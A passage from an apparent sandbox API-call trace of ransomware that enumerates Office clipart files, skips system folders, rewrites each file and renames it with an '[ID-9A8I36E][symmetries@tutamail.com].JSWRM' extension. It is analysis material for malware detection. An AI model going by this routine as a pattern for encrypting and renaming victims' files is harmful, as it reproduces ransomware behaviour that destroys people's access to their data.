lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0078.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0078.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0078.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0078.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0078.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0078.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0078.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0078.861] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00241_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00241_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00241_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00241_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0078.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0078.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0078.862] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf50660, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf50660, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf50660, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe4e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH00260_.WMF", cAlternateFileName="")) returned 1 [0078.862] lstrcmpiW (lpString1="HH00260_.WMF", lpString2=".") returned 1 [0078.862] lstrcmpiW (lpString1="HH00260_.WMF", lpString2="..") returned 1 [0078.862] lstrcmpiW (lpString1="HH00260_.WMF", lpString2="...") returned 1 [0078.862] lstrcmpiW (lpString1="HH00260_.WMF", lpString2="windows") returned -1 [0078.862] lstrcmpiW (lpString1="HH00260_.WMF", lpString2="recovery") returned -1 [0078.862] lstrcmpiW (lpString1="HH00260_.WMF", lpString2="perflogs") returned -1 [0078.862] lstrcmpiW (lpString1="HH00260_.WMF", lpString2="documents and settings") returned 1 [0078.862] lstrcmpiW (lpString1="HH00260_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0078.862] lstrcmpiW (lpString1="HH00260_.WMF", lpString2="system volume information") returned -1 [0078.862] lstrcmpiW (lpString1="HH00260_.WMF", lpString2="msocache") returned -1 [0078.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0078.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00260_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00260_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00260_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0078.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0078.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00260_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00260_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00260_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0078.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0078.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0078.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0078.862] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00260_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00260_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.863] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3662) returned 1 [0078.863] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe40) returned 0x23fc98 [0078.863] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xe40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xe40, lpOverlapped=0x0) returned 1 [0078.864] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.864] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xe40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xe40, lpOverlapped=0x0) returned 1 [0078.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0078.865] CloseHandle (hObject=0x314) returned 1 [0078.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0078.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0078.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0078.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0078.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0078.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0078.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0078.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0078.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0078.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0078.865] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00260_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00260_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00260_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00260_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0078.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0078.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0078.866] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf76988, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf76988, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf76988, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbc8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH00276_.WMF", cAlternateFileName="")) returned 1 [0078.866] lstrcmpiW (lpString1="HH00276_.WMF", lpString2=".") returned 1 [0078.866] lstrcmpiW (lpString1="HH00276_.WMF", lpString2="..") returned 1 [0078.866] lstrcmpiW (lpString1="HH00276_.WMF", lpString2="...") returned 1 [0078.866] lstrcmpiW (lpString1="HH00276_.WMF", lpString2="windows") returned -1 [0078.866] lstrcmpiW (lpString1="HH00276_.WMF", lpString2="recovery") returned -1 [0078.866] lstrcmpiW (lpString1="HH00276_.WMF", lpString2="perflogs") returned -1 [0078.866] lstrcmpiW (lpString1="HH00276_.WMF", lpString2="documents and settings") returned 1 [0078.866] lstrcmpiW (lpString1="HH00276_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0078.866] lstrcmpiW (lpString1="HH00276_.WMF", lpString2="system volume information") returned -1 [0078.866] lstrcmpiW (lpString1="HH00276_.WMF", lpString2="msocache") returned -1 [0078.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0078.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00276_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00276_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00276_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0078.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0078.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00276_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00276_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00276_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0078.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0078.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0078.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0078.866] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00276_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00276_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.867] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3016) returned 1 [0078.867] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbc0) returned 0x23fc98 [0078.867] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xbc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xbc0, lpOverlapped=0x0) returned 1 [0078.869] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.869] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xbc0, lpOverlapped=0x0) returned 1 [0078.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0078.869] CloseHandle (hObject=0x314) returned 1 [0078.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0078.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0078.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0078.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0078.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0078.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0078.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0078.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0078.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0078.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0078.870] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00276_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00276_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00276_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00276_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0078.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0078.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0078.870] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf76988, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf76988, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf76988, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5f8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH00334_.WMF", cAlternateFileName="")) returned 1 [0078.870] lstrcmpiW (lpString1="HH00334_.WMF", lpString2=".") returned 1 [0078.870] lstrcmpiW (lpString1="HH00334_.WMF", lpString2="..") returned 1 [0078.870] lstrcmpiW (lpString1="HH00334_.WMF", lpString2="...") returned 1 [0078.870] lstrcmpiW (lpString1="HH00334_.WMF", lpString2="windows") returned -1 [0078.870] lstrcmpiW (lpString1="HH00334_.WMF", lpString2="recovery") returned -1 [0078.870] lstrcmpiW (lpString1="HH00334_.WMF", lpString2="perflogs") returned -1 [0078.870] lstrcmpiW (lpString1="HH00334_.WMF", lpString2="documents and settings") returned 1 [0078.870] lstrcmpiW (lpString1="HH00334_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0078.870] lstrcmpiW (lpString1="HH00334_.WMF", lpString2="system volume information") returned -1 [0078.871] lstrcmpiW (lpString1="HH00334_.WMF", lpString2="msocache") returned -1 [0078.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0078.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00334_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00334_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00334_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0078.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0078.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00334_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00334_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00334_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0078.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0078.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0078.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0078.871] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00334_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00334_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.871] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1528) returned 1 [0078.871] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5f0) returned 0x2332c0 [0078.871] ReadFile (in: hFile=0x314, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x5f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x5f0, lpOverlapped=0x0) returned 1 [0078.873] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.873] WriteFile (in: hFile=0x314, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x5f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x5f0, lpOverlapped=0x0) returned 1 [0078.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0078.873] CloseHandle (hObject=0x314) returned 1 [0078.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0078.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0078.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0078.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0078.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0078.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0078.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0078.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0078.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0078.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0078.873] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00334_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00334_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00334_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00334_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0078.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0078.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 